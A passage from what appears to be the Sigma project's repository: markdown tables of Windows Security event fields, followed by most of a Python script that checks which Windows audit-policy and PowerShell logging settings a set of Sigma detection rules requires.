EventID: 4672\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- PrivilegeList\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4673\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- ObjectServer\n- Service\n- PrivilegeList\n- ProcessId\n- ProcessName\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4688\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- NewProcessId\n- NewProcessName\n- TokenElevationType\n- ProcessId\n- CommandLine\n- TargetUserSid\n- TargetUserName\n- TargetDomainName\n- TargetLogonId\n- ParentProcessName\n- MandatoryLabel\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4689\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- Status\n- ProcessId\n- ProcessName\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4702\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- TaskName\n- TaskContentNew\n- ClientProcessStartKey\n- ClientProcessId\n- ParentProcessId\n- RpcCallClientLocality\n- FQDN\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4703\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- SubjectUserSid\n- SubjectUserName\n- SubjectDomainName\n- SubjectLogonId\n- TargetUserSid\n- TargetUserName\n- TargetDomainName\n- TargetLogonId\n- ProcessName\n- ProcessId\n- EnabledPrivilegeList\n- DisabledPrivilegeList\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 4957\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- RuleId\n- RuleName\n- RuleAttr\n```\n\n</details>\n\n### Provider: Microsoft Windows Security Auditing / EventID: 5447\n\n<details>\n    <summary>Expand</summary>\n\n```yml\n- ProcessId\n- UserSid\n- UserName\n- ProviderKey\n- ProviderName\n- ChangeType\n- FilterKey\n- FilterName\n- FilterType\n- FilterId\n- LayerKey\n- LayerName\n- LayerId\n- Weight\n- Conditions\n- Action\n- CalloutKey\n- CalloutName\n```\n\n</details>\n"
  },
  {
    "path": "documentation/tools/sigma-logsource-checker.py",
    "content": "# Author: Nasreddine Bencherchali (@nas_bench) / Nextron Systems\n\n__version__ = \"0.1.0\"\n\nfrom time import sleep\nimport yaml\nimport os\nimport argparse\nfrom colorama import init\nfrom colorama import Fore\nimport collections\nimport xml.etree.ElementTree as ET\nfrom collections import defaultdict\n\nSECURITY_EVENT_ID_MAPPING = {\n    # Account Logon\n    \"{0CCE923F-69AE-11D9-BED3-505054503030}\": {\"EventIDs\": [4774, 4775, 4776, 4777], \"Name\": \"Audit Credential Validation\"},\n    \"{0CCE9242-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4768, 4771, 4772], \"Name\": \"Audit Kerberos Authentication Service\"},\n    \"{0CCE9240-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4769, 4770, 4773], \"Name\": \"Audit Kerberos Service Ticket Operations\"},\n    \"{0CCE9241-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [], \"Name\": \"Audit Other Account Logon Events\"},\n    # Account Management\n    \"{0CCE9239-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4783, 4784, 4785, 4786, 4787, 4788, 4789, 4790, 4791, 4792], \"Name\": \"Audit Application Group Management\"},\n    \"{0CCE9236-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4741, 4742, 4743], \"Name\": \"Audit Computer Account Management\"},\n    \"{0CCE9238-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4749, 4750, 4751, 4752, 4753], \"Name\": \"Audit Distribution Group Management\"},\n    \"{0CCE923A-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4782, 4793], \"Name\": \"Audit Other Account Management Events\"},\n    \"{0CCE9237-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4731, 4732, 4733, 4734, 4735, 4764, 4799, 4727, 4737, 4728, 4729, 4730, 4754, 4755, 4756, 4757, 4758], \"Name\": \"Audit Security Group Management\"},\n    \"{0CCE9235-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4720, 4722, 4723, 4724, 4725, 4726, 4738, 4740, 4765, 4766, 4767, 4780, 4781, 4794, 4798, 5376, 5377], \"Name\": \"Audit User Account Management\"},\n    # Detailed Tracking\n    \"{0CCE922D-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4692, 4693, 4694, 4695], \"Name\": \"Audit DPAPI Activity\"},\n    \"{0CCE9248-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [6416, 6419, 6420, 6421, 6422, 6423, 6424], \"Name\": \"Audit PNP Activity\"},\n    \"{0CCE922B-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4688, 4696], \"Name\": \"Audit Process Creation\"},\n    \"{0CCE922C-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4689], \"Name\": \"Audit Process Termination\"},\n    \"{0CCE922E-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5712], \"Name\": \"Audit RPC Events\"},\n    \"{0CCE924A-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4703], \"Name\": \"Audit Token Right Adjusted\"},\n    # DS Access\n    \"{0CCE923E-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4928, 4929, 4930, 4931, 4934, 4935, 4936, 4937], \"Name\": \"Audit Detailed Directory Service Replication\"},\n    \"{0CCE923B-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4661, 4662], \"Name\": \"Audit Directory Service Access\"},\n    \"{0CCE923C-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5136, 5137, 5138, 5139, 5141], \"Name\": \"Audit Directory Service Changes\"},\n    \"{0CCE923D-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4932, 4933], \"Name\": \"Audit Directory Service Replication\"},\n    # Logon/Logoff\n    \"{0CCE9217-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4625], \"Name\": \"Audit Account Lockout\"},\n    \"{0CCE9247-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4626], \"Name\": \"Audit User/Device Claims\"},\n    \"{0CCE9249-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4627], \"Name\": \"Audit Group Membership\"},\n    \"{0CCE921A-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4978, 4979, 4980, 4981, 4982, 4983, 4984], \"Name\": \"Audit IPsec Extended Mode\"},\n    \"{0CCE9218-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4646, 4650, 4651, 4652, 4653, 4655, 4976, 5049, 5453], \"Name\": \"Audit IPsec Main Mode\"},\n    \"{0CCE9219-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4977, 5451, 5452], \"Name\": \"Audit IPsec Quick Mode\"},\n    \"{0CCE9216-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4634, 4647], \"Name\": \"Audit Logoff\"},\n    \"{0CCE9215-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4624, 4625, 4648, 4675], \"Name\": \"Audit Logon\"},\n    \"{0CCE9243-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280], \"Name\": \"Audit Network Policy Server\"},\n    \"{0CCE921C-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4649, 4778, 4779, 4800, 4801, 4802, 4803, 5378, 5632, 5633], \"Name\": \"Audit Other Logon/Logoff Events\"},\n    \"{0CCE921B-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4964, 4672], \"Name\": \"Audit Special Logon\"},\n    # Object Access\n    \"{0CCE9222-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4665, 4666, 4667, 4668], \"Name\": \"Audit Application Generated\"},\n    \"{0CCE9221-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4868, 4869, 4870, 4871, 4872, 4873, 4874, 4875, 4876, 4877, 4878, 4879, 4880, 4881, 4882, 4883, 4884, 4885, 4886, 4887, 4888, 4889, 4890, 4891, 4892, 4893, 4894, 4895, 4896, 4897, 4898], \"Name\": \"Audit Certification Services\"},\n    \"{0CCE9244-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5145], \"Name\": \"Audit Detailed File Share\"},\n    \"{0CCE9224-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5140, 5142, 5143, 5144, 5168], \"Name\": \"Audit File Share\"},\n    \"{0CCE921D-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4656, 4658, 4660, 4663, 4664, 4670, 4985, 5051], \"Name\": \"Audit File System\"},\n    \"{0CCE9226-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5031, 5150, 5151, 5154, 5155, 5156, 5157, 5158, 5159], \"Name\": \"Audit Filtering Platform Connection\"},\n    \"{0CCE9225-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5152, 5153], \"Name\": \"Audit Filtering Platform Packet Drop\"},\n    \"{0CCE9223-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4658, 4690], \"Name\": \"Audit Handle Manipulation\"},\n    \"{0CCE921F-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4656, 4658, 4660, 4663], \"Name\": \"Audit Kernel Object\"},\n    \"{0CCE9227-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4671, 4691, 4698, 4699, 4700, 4701, 4702, 5148 ,5149, 5888, 5889, 5890], \"Name\": \"Audit Other Object Access Events\"},\n    \"{0CCE921E-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4656, 4657, 4658, 4660, 4663, 4670, 5039], \"Name\": \"Audit Registry\"},\n    \"{0CCE9245-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4656, 4658, 4663], \"Name\": \"Audit Removable Storage\"},\n    \"{0CCE9220-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4661], \"Name\": \"Audit SAM\"},\n    \"{0CCE9246-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4818], \"Name\": \"Audit Central Access Policy Staging\"},\n    # Policy Change\n    \"{0CCE922F-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4715, 4719, 4817, 4902, 4906, 4907, 4908, 4912, 4904, 4905], \"Name\": \"Audit Audit Policy Change\"},\n    \"{0CCE9230-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4670, 4706, 4707, 4716, 4713, 4717, 4718, 4739, 4864, 4865, 4866, 4867], \"Name\": \"Audit Authentication Policy Change\"},\n    \"{0CCE9231-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4703, 4704, 4705, 4670, 4911, 4913], \"Name\": \"Audit Authorization Policy Change\"},\n    \"{0CCE9233-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4709, 4710, 4711, 4712, 5040, 5041, 5042, 5043, 5044, 5045, 5046, 5047, 5048, 5440, 5441, 5442, 5443, 5444, 5446, 5448, 5449, 5450, 5456, 5457, 5458, 5459, 5460, 5461, 5462, 5463, 5464, 5465, 5466, 5467, 5468, 5471, 5472, 5473, 5474, 5477], \"Name\": \"Audit Filtering Platform Policy Change\"},\n    \"{0CCE9232-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4944, 4945, 4946, 4947, 4948, 4949, 4950, 4951, 4952, 4953, 4954, 4956, 4957, 4958], \"Name\": \"Audit MPSSVC Rule-Level Policy Change\"},\n    \"{0CCE9234-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4714, 4819, 4826, 4909, 4910, 5063, 5064, 5065, 5066, 5067, 5068, 5069, 5070, 5447, 6144, 6145], \"Name\": \"Audit Other Policy Change Events\"},\n    # Privilege Use\n    \"{0CCE9229-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4673, 4674, 4985], \"Name\": \"Audit Non Sensitive Privilege Use\"},\n    \"{0CCE922A-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4985], \"Name\": \"Audit Other Privilege Use Events\"},\n    \"{0CCE9228-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4673, 4674, 4985], \"Name\": \"Audit Sensitive Privilege Use\"},\n    # System\n    \"{0CCE9213-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4960, 4961, 4962, 4963, 4965, 5478, 5479, 5480, 5483, 5484, 5485], \"Name\": \"Audit IPsec Driver\"},\n    \"{0CCE9214-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [5024, 5025, 5027, 5028, 5029, 5030, 5032, 5033, 5034, 5035, 5037, 5058, 5059, 6400, 6401, 6402, 6403, 6404, 6405, 6406, 6407, 6408, 6409], \"Name\": \"Audit Other System Events\"},\n    \"{0CCE9210-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4608, 4616, 4621], \"Name\": \"Audit Security State Change\"},\n    \"{0CCE9211-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4610, 4611, 4614, 4622, 4697], \"Name\": \"Audit Security System Extension\"},\n    \"{0CCE9212-69AE-11D9-BED3-505054503030}\" : { \"EventIDs\": [4612, 4615, 4618, 4816, 5038, 5056, 5062, 5057, 5060, 5061, 6281, 6410], \"Name\": \"Audit System Integrity\"}\n}\n\nOTHER_EVENT_ID_MAPPING = {\n    'PowerShell Core': [\n        {'Turn on Module Logging': 'Disabled'},\n        {'Turn on PowerShell Script Block Logging': 'Disabled'},\n        {'Turn on PowerShell Transcription': 'Disabled'}\n        ], \n    'System/Audit Process Creation': [\n        {'Include command line in process creation events': 'Disabled'}\n        ], \n    'Windows Components/Windows PowerShell': [\n        {'Turn on Module Logging': 'Disabled'},\n        {'Turn on PowerShell Script Block Logging': 'Disabled'},\n        {'Turn on PowerShell Transcription': 'Disabled'}]\n}\n\nWINDOWS_SYSMON_PROCESS_CREATION_FIELDS = [\"RuleName\", \"UtcTime\", \"ProcessGuid\", \"ProcessId\", \"Image\", \"FileVersion\", \"Description\", \"Product\", \"Company\", \"OriginalFileName\", \"CommandLine\", \"CurrentDirectory\", \"User\", \"LogonGuid\", \"LogonId\", \"TerminalSessionId\", \"IntegrityLevel\", \"Hashes\", \"ParentProcessGuid\", \"ParentProcessId\", \"ParentImage\", \"ParentCommandLine\", \"ParentUser\"]\n\n# A reduced set of unique fields that only available to Sysmon/1 - Used for testing\nWINDOWS_SYSMON_SPECIAL_PROCESS_CREATION_FIELDS = [\"RuleName\", \"UtcTime\", \"ProcessGuid\", \"FileVersion\", \"Description\", \"Product\", \"Company\", \"OriginalFileName\", \"CurrentDirectory\", \"User\", \"LogonGuid\", \"LogonId\", \"TerminalSessionId\", \"IntegrityLevel\", \"Hashes\", \"ParentProcessGuid\", \"ParentProcessId\", \"ParentCommandLine\", \"ParentUser\"]\n\nWINDOWS_SECURITY_PROCESS_CREATION_FIELDS = [\"SubjectUserSid\", \"SubjectUserName\", \"SubjectDomainName\", \"SubjectLogonId\", \"NewProcessId\", \"NewProcessName\", \"TokenElevationType\", \"ProcessId\", \"CommandLine\", \"TargetUserSid\", \"TargetUserName\", \"TargetDomainName\", \"TargetLogonId\", \"ParentProcessName\", \"MandatoryLabel\"]\n\n# A reduced set of unique fields that only available to Security/4688 - Used for testing\nWINDOWS_SECURITY_SPECIAL_PROCESS_CREATION_FIELDS = [\"SubjectUserSid\", \"SubjectUserName\", \"SubjectDomainName\", \"SubjectLogonId\", \"NewProcessId\", \"NewProcessName\", \"TokenElevationType\", \"ProcessId\", \"TargetUserSid\", \"TargetUserName\", \"TargetDomainName\", \"TargetLogonId\", \"ParentProcessName\", \"MandatoryLabel\"]\n\ndef yield_next_rule_file_path(path_to_rules: str) -> str:\n    for root, _, files in os.walk(path_to_rules):\n        for file in files:\n            if file.endswith(\".yml\"):\n                yield os.path.join(root, file)\n\ndef get_rule_part(file_path: str, part_name: str):\n    yaml_dicts = get_rule_yaml(file_path)\n    for yaml_part in yaml_dicts:\n        if part_name in yaml_part.keys():\n            return yaml_part[part_name]\n\n    return None\n\ndef get_rule_yaml(file_path: str) -> dict:\n    data = []\n\n    with open(file_path, encoding='utf-8') as f:\n        yaml_parts = yaml.safe_load_all(f)\n        for part in yaml_parts:\n            data.append(part)\n\n    return data\n\ndef extract_events_ids(detection):\n    eids_list = []\n    for key, value in detection.items():\n        if type(value) == dict:\n            for key_, value_ in value.items():\n                if key_ == \"EventID\":\n                    if type(value_) == int:\n                        eids_list.append(value_)\n                    elif type(value_) == list:\n                        for i in value_:\n                            eids_list.append(i)\n        else:\n            pass\n    \n    return eids_list\n    \n\ndef test_invalid_logsource_attributes(path_to_rules):\n    \"\"\"\n        Returns list of rules that leverage unknown logsource\n    \"\"\"\n    faulty_rules = []\n    valid_logsource = [\n        'category',\n        'product',\n        'service',\n        'definition',\n    ]\n\n    for file in yield_next_rule_file_path(path_to_rules):\n        logsource = get_rule_part(file_path=file, part_name=\"logsource\")\n        if not logsource:\n            print(\"Rule {} has no 'logsource'.\".format(file))\n            faulty_rules.append(file)\n            continue\n        valid = True\n        for key in logsource:\n            if key.lower() not in valid_logsource:\n                print(\"Rule {} has a logsource with an invalid field ({})\".format(file, key))\n                valid = False\n            elif not isinstance(logsource[key], str):\n                print(\"Rule {} has a logsource with an invalid field type ({})\".format(file, key))\n                valid = False\n        if not valid:\n            faulty_rules.append(file)\n\n    return faulty_rules\n\ndef extract_fields(detection):\n\n    list_of_fields = []\n\n    for key, value in detection.items():\n        if type(value) == list:\n            for element in value:\n                if type(element) == dict:\n                    for key_, value_ in element.items():\n                        field = key_.split(\"|\")[0]\n                        if field not in list_of_fields:\n                            list_of_fields.append(field)\n        if type(value) == dict:\n            for key_, value_ in value.items():\n                field = key_.split(\"|\")[0]\n                if field not in list_of_fields:\n                        list_of_fields.append(field)\n    return list_of_fields\n\ndef get_logsource_dict(path_to_rules, broken_rules):\n    \"\"\"\n        Return a list of dicts of all unique log sources\n    \"\"\"\n    logsource_dict_list_tmp = []\n\n    # Add as many specific service log sources we have defined\n    windows_service_security_dict = defaultdict(list)\n    windows_service_powershell_dict = defaultdict(list)\n    windows_category_process_creation_dict = defaultdict(list)\n    windows_category_ps_module_dict = defaultdict(list)\n    windows_category_ps_script_dict = defaultdict(list)\n\n    for file_ in yield_next_rule_file_path(path_to_rules):\n        if file_ not in broken_rules:\n            logsource = get_rule_part(file_path=file_, part_name=\"logsource\")\n            detection = get_rule_part(file_path=file_, part_name=\"detection\")\n            logsource.pop(\"definition\", None)\n\n            if ((\"product\" in logsource.keys()) and (len(logsource) == 1)):\n                # We skip rules that do not specify exact services for V0.1 // Mainly the generic MIMIKATZ rule\n                continue\n            else:\n                if \"product\" in logsource:\n                    # For V0.1 we check for windows logs only\n                    if logsource[\"product\"].lower() == \"windows\":\n\n                        if \"category\" in logsource:\n                            if logsource['category'] == \"process_creation\":\n                                # {\"rule_file_name\" : [fields used]}\n                                fields = extract_fields(detection)\n                                windows_category_process_creation_dict[file_] = fields\n\n                            elif logsource['category'] == \"ps_script\":\n                                fields = extract_fields(detection)\n                                windows_category_ps_script_dict[file_] = fields\n\n                            elif logsource['category'] == \"ps_module\":\n                                # {\"rule_file_name\" : [fields used]}\n                                fields = extract_fields(detection)\n                                windows_category_ps_module_dict[file_] = fields\n                                \n                        elif \"service\" in logsource:\n                            if logsource[\"service\"].lower() == \"security\":\n                                eid_list = extract_events_ids(detection)\n                                windows_service_security_dict[file_] = eid_list\n                                \n\n                            elif logsource[\"service\"].lower() == \"powershell\":\n                                eid_list = extract_events_ids(detection)\n                                windows_service_powershell_dict[file_] = eid_list\n\n    return windows_service_security_dict, windows_service_powershell_dict, windows_category_process_creation_dict, windows_category_ps_module_dict, windows_category_ps_script_dict\n\ndef enrich_logsource_dict(logsource_dict_list):\n    for logsource in logsource_dict_list:\n        if \"product\" in logsource.keys:\n            if logsource[\"product\"] == \"windows\":\n                if \"service\" in logsource.keys:\n                    pass\n                elif \"category\" in logsource.keys:\n                    pass\n\ndef parse_gpresult(gpresult):\n    \"\"\"\n        Parses GPResult command XML output\n    \"\"\"\n    enabled_sec_policies = []\n    enabled_other_logs = defaultdict(list)\n    \n    tree = ET.parse(gpresult)\n    root = tree.getroot()\n    for child in root:\n        if \"ComputerResults\" in child.tag:\n            computerResultsNode = child\n            break\n    extensionDataList = []\n    for i in computerResultsNode:\n        if \"ExtensionData\" in i.tag:\n            extensionDataList.append(i)\n        \n    for i in extensionDataList:\n        ext_type = i[0].attrib[next(iter(i[0].attrib))]\n        if \"AuditSettings\" in ext_type:\n            auditSettings = i[0]\n            for audit in auditSettings:\n                SubcategoryGuid = \"\"\n                SettingValue = \"\"\n                for element in audit:\n                    if \"SubcategoryGuid\" in element.tag:\n                        SubcategoryGuid = element\n                    elif \"SettingValue\" in element.tag:\n                        SettingValue = element\n                # If the audit settings is enabled for \"Success\" or both \"Success and Failure\". Then it's okay (for V0.1)\n                if SettingValue.text == \"1\" or SettingValue.text == \"3\":\n                    enabled_sec_policies.append(SubcategoryGuid.text.upper())\n        elif \"Registry\" in ext_type:\n            registrySettings = i[0]\n            for policy in registrySettings:\n                if \"}Policy\" in policy.tag:\n                    policyName = \"\"\n                    policyState = \"\"\n                    policyCategory = \"\"\n                    for element in policy:\n                        if \"Name\" in element.tag:\n                            policyName = element\n                        elif \"State\" in element.tag:\n                            policyState = element\n                        elif \"Category\" in element.tag:\n                            policyCategory = element\n                    # {\"Category\": {\"Name\": \"State\"}}\n                    tmp = {policyName.text : policyState.text}\n                    enabled_other_logs[policyCategory.text].append(tmp)\n    \n    return enabled_sec_policies, enabled_other_logs\n    \n\n\n\nif __name__ == \"__main__\":\n\n    print(f\"\"\"\n       _____ _                                                                                   \n      / ___/(_)___ _____ ___  ____ _                                                             \n      \\__ \\/ / __ `/ __ `__ \\/ __ `/                                                             \n     ___/ / / /_/ / / / / / / /_/ /                                                              \n    /____/_/\\__, /_/ /_/ /_/\\__,_/                           ________              __            \n       / / /____/  ____ __________  __  _______________     / ____/ /_  ___  _____/ /_____  _____\n      / /   / __ \\/ __ `/ ___/ __ \\/ / / / ___/ ___/ _ \\   / /   / __ \\/ _ \\/ ___/ //_/ _ \\/ ___/\n     / /___/ /_/ / /_/ (__  ) /_/ / /_/ / /  / /__/  __/  / /___/ / / /  __/ /__/ ,< /  __/ /    \n    /_____/\\____/\\__, /____/\\____/\\__,_/_/   \\___/\\___/   \\____/_/ /_/\\___/\\___/_/|_|\\___/_/     \n                /____/  by Nasreddine Bencherchali (Nextron Systems), v{__version__}             \n    \"\"\")\n    \n    parser = argparse.ArgumentParser(description='SIGMA Logsource Checker')\n    parser.add_argument('-d', help='Path to input directory (SIGMA rules folder; recursive)', metavar='sigma-rules-folder', required=True)\n    parser.add_argument('-gp', help='XML output of the command \"gpresult.exe /x [path]\"', metavar='gpresult')\n    #parser.add_argument('-sysmon', help='Sysmon configuration', metavar='sysmon-config') # TODO: add Sysmon config parser\n    parser.add_argument('-v', help='Get audit and logging details for every rule', action=\"store_true\")\n    #parser.add_argument('-vv', help='Get audit and logging details for every rule', metavar='Very Verbose')\n    args = parser.parse_args()\n\n    if os.path.isdir(args.d):\n        path_to_rules = args.d\n    else:\n        print(\"The path provided isn't a directory: %s\" % args.d)\n        exit(1)\n\n    if args.gp:\n        gpresult = args.gp\n        print(\"Parsing gpresults file (XML) %s ...\\n\" % args.gp)\n        subcategory_id, enabled_other_logs = parse_gpresult(gpresult)\n    else:\n        subcategory_id = []\n        enabled_other_logs = OTHER_EVENT_ID_MAPPING\n\n    print(\"Discovering used log sources ...\\n\")\n    \n    faulty_rules = test_invalid_logsource_attributes(path_to_rules)\n    windows_service_security_dict, windows_service_powershell_dict, windows_category_process_creation_dict, windows_category_ps_module_dict, windows_category_ps_script_dict = get_logsource_dict(path_to_rules, faulty_rules)\n\n    if args.v:\n\n        print(\"Generating detailed logging requirements information for every rule...\\n\")\n        sleep(1)\n\n        if windows_category_process_creation_dict:\n            print(f\"\\nChecking rules with logsource - 'product: windows / category: process_creation'...\")\n            # We check special fields. If they exist then we suggest the policy to be enabled\n            for filename, fields in windows_category_process_creation_dict.items():\n                special_fields_sysmon = []\n                special_fields_security = []\n                for field in fields:\n                    if field in WINDOWS_SYSMON_SPECIAL_PROCESS_CREATION_FIELDS:\n                        special_fields_sysmon.append(field)\n                    elif field in WINDOWS_SECURITY_SPECIAL_PROCESS_CREATION_FIELDS:\n                        special_fields_security.append(field)\n                \n                if special_fields_sysmon:\n                    print(\"-> Rule '{}' uses fields: {} which Requires Microsoft-Windows-Sysmon EID 1 to be enabled\".format(os.path.basename(filename), special_fields_sysmon))\n                elif special_fields_security:\n                    if \"{0CCE922B-69AE-11D9-BED3-505054503030}\" not in subcategory_id:\n                        print(\"-> Rule '{}' uses fields: {} which Requires Microsoft Windows Security Auditing EID 4688 to be enabled\".format(os.path.basename(filename), special_fields_security))\n                else:\n                    if \"{0CCE922B-69AE-11D9-BED3-505054503030}\" not in subcategory_id:\n                        print(\"-> Rule '{}' uses fields: {} which Requires 'Microsoft Windows Security Auditing EID 4688' or 'Microsoft-Windows-Sysmon EID 1' to be enabled\".format(os.path.basename(filename), fields))\n\n        if windows_category_ps_module_dict:\n            print(f\"\\nChecking rules with logsource - 'product: windows / category: ps_module'...\")\n            pwsh5_ps_module_enabled = False\n            pwsh5 = \"Windows Components/Windows PowerShell\"\n            #pwsh7 = \"PowerShell Core\" # TODO: Add PWSH7 Checks\n            if pwsh5 in enabled_other_logs:\n                if enabled_other_logs[pwsh5][0]['Turn on Module Logging'] == \"Enabled\":\n                    pwsh5_ps_module_enabled = True\n\n            for filename, fields in windows_category_ps_module_dict.items():\n                if not pwsh5_ps_module_enabled:\n                    print(\"-> Rule '{}' uses fields: {} which Requires Microsoft-Windows-PowerShell EID 4103 to be enabled\".format(os.path.basename(filename), fields))\n        \n        if windows_category_ps_script_dict:\n            print(f\"\\nChecking rules with logsource - 'product: windows / category: ps_script'...\")\n            pwsh5_ps_script_enabled = False\n            pwsh5 = \"Windows Components/Windows PowerShell\"\n            #pwsh7 = \"PowerShell Core\" # TODO: Add PWSH7 Checks\n            if pwsh5 in enabled_other_logs:\n                if enabled_other_logs[pwsh5][1]['Turn on PowerShell Script Block Logging'] == \"Enabled\":\n                    pwsh5_ps_script_enabled = True\n            for filename, fields in windows_category_ps_script_dict.items():\n                if not pwsh5_ps_script_enabled:\n                    print(\"-> Rule '{}' uses fields: {} which Requires Microsoft-Windows-PowerShell EID 4104 to be enabled\".format(os.path.basename(filename), fields))\n\n        if windows_service_security_dict:\n            print(f\"\\nChecking rules using logsource - 'product: windows / service: security'...\")\n            for filename, eids in windows_service_security_dict.items():\n                specific_eids = set()\n                specific_subcategory = set()\n                for eid in eids:\n                    for key, value in SECURITY_EVENT_ID_MAPPING.items():\n                        if value['EventIDs']:\n                            if ((eid in value['EventIDs']) and (key not in subcategory_id)):\n                                specific_eids.add(eid)\n                                specific_subcategory.add((key, value['Name']))\n                \n                specific_eids = list(specific_eids)\n                specific_subcategory = list(specific_subcategory)\n                \n                \n                if len(specific_subcategory) > 1:\n                    print(\"-> Rule '{}' uses EventIDs: {} which Requires:\".format(os.path.basename(filename), specific_eids))\n                    for i in specific_subcategory:\n                        print(\"      - '{}' / {} to be enabled\".format(i[1], i[0]))\n                else:\n                    if len(specific_subcategory) != 0:\n                        print(\"-> Rule '{}' uses EventIDs: {} which Requires: '{}' / {} to be enabled\".format(os.path.basename(filename), specific_eids, specific_subcategory[0][1], specific_subcategory[0][0]))\n\n\n            \n    else:\n\n        print(\"Generating generic logging requirements information for the rule set...\")\n        sleep(1)\n\n        # If no verbose mode was triggered we generate a generic audit policy suggestion for all rules\n        # Process Creation Rules\n        if windows_category_process_creation_dict:\n            enable_sysmon = False\n            enable_4688 = False\n            print(f\"\\nChecking rules with logsource - 'product: windows / category: process_creation'...\")\n            # We check special fields. If they exist then we suggest the policy to be enabled\n            all_process_creation_fields = []\n            for filename, fields in windows_category_process_creation_dict.items():\n                all_process_creation_fields += fields\n            all_process_creation_fields = list(set(all_process_creation_fields))\n            for field in WINDOWS_SYSMON_SPECIAL_PROCESS_CREATION_FIELDS:\n                if field in all_process_creation_fields:\n                    enable_sysmon = True\n                    print(\"-> Rules use Sysmon EID 1 only fields. A Sysmon configuration monitoring Process Creation is required\")\n                    break\n            if not enable_sysmon:\n                for field in WINDOWS_SECURITY_SPECIAL_PROCESS_CREATION_FIELDS:\n                    if field in all_process_creation_fields:\n                        if \"{0CCE922B-69AE-11D9-BED3-505054503030}\" not in subcategory_id:\n                            enable_4688 = True\n                            print(\"-> Rules use Microsoft-Windows-Security-Auditing EID 4688 only fields. Audit policy sub-category {0CCE922B-69AE-11D9-BED3-505054503030} / 'Process Creation' must be enabled\")\n                            break\n                        else:\n                            print(\"Audit policy sub-category {0CCE922B-69AE-11D9-BED3-505054503030} / 'Process Creation' is already enabled\")\n                            break\n                if not enable_4688:\n                    print(\"-> Audit policy sub-category {0CCE922B-69AE-11D9-BED3-505054503030} / 'Process Creation' must be enabled\")\n\n        if windows_category_ps_module_dict:\n            print(f\"\\nChecking rules with logsource - 'product: windows / category: ps_module'...\")\n            \n            pwsh5 = \"Windows Components/Windows 